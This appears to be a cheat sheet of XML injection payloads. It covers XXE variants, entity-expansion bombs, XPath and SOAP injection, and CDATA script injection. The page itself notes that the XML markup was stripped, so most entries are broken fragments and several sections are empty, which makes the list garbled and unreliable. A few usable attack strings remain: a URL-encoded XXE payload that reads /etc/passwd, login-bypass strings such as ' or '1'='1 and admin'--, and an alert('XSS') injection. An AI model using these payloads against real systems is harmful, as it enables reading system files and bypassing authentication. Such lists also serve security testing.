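# XML Injection Payloads

Note: the XML markup in the samples below (the prolog, the `<!DOCTYPE` and `<!ENTITY` declarations, and the element tags) was stripped when this page was extracted. Most lines are therefore only the tail of a sample and are not well-formed XML, and several sections have no sample left at all. The XXE, XInclude and entity-expansion categories depend on the parser processing DTDs or resolving external entities. The XPath, SOAP and attribute string samples depend on input being concatenated unescaped into a query or document.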
## Basic XML External Entity (XXE) Payloads
]>&xxe;
]>&xxe;
]>&xxe;
## XXE with Parameter Entities
">%eval;%exfil;]>
%xxe;]>
## XXE via SVG Upload
## XXE via SOAP
]>&xxe;
## XXE Out-of-Band (OOB)
%xxe;]>
%dtd;]>
## Blind XXE (Error-Based)
">%eval;%error;]>
## XXE with UTF-7
+ADw-?xml version="1.0"?+AD4-]>&xxe;
## XML Billion Laughs Attack (DoS)
]>&lol9;
## XXE with Base64 Encoding
]>&xxe;
## XXE via XInclude
## XXE with Expect (PHP)
]>&xxe;
]>&xxe;
## XXE with Data Protocol
]>&xxe;
## XXE via DOCTYPE
]>&xxe;
]>&xxe;
## XXE Local File Inclusion (LFI)
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
## XXE for Windows
]>&xxe;
]>&xxe;
]>&xxe;
## XXE SSRF
]>&xxe;
]>&xxe;
]>&xxe;
## XML Injection via CDATA
alert('XSS')]]>
]]>
## XPath Injection
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
admin' or '1'='1
'or 1=1--
' or 1=1#
admin'--
') or ('1'='1
## SOAP XML Injection
admin' or '1'='1anything
## XML Bomb Variants
]>&e;
## Encoded XXE Payloads
%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
## XXE via RSS Feed
]>&xxe;
## XXE via XML Sitemap
]>&xxe;
## XXE with Public and System Identifiers
## XXE Exfiltration via FTP
%dtd;]>
## XXE with UTF-16
]>&xxe;
## Java-specific XXE
]>&xxe;
]>&xxe;
## XXE via XForms
]>&xxe;
## Nested Entity Attacks
">]>&outer;&inner;
## XXE Filter Bypass
]>&xxe;
]>&xxe;
]>&xxe;
## XML Attribute Injection
admin'--
## XSLT Injection
## SVG XXE Advanced
]>
## Office Document XXE (DOCX, XLSX, etc.)
]>&xxe;
## XXE via PDF Upload
]>&xxe;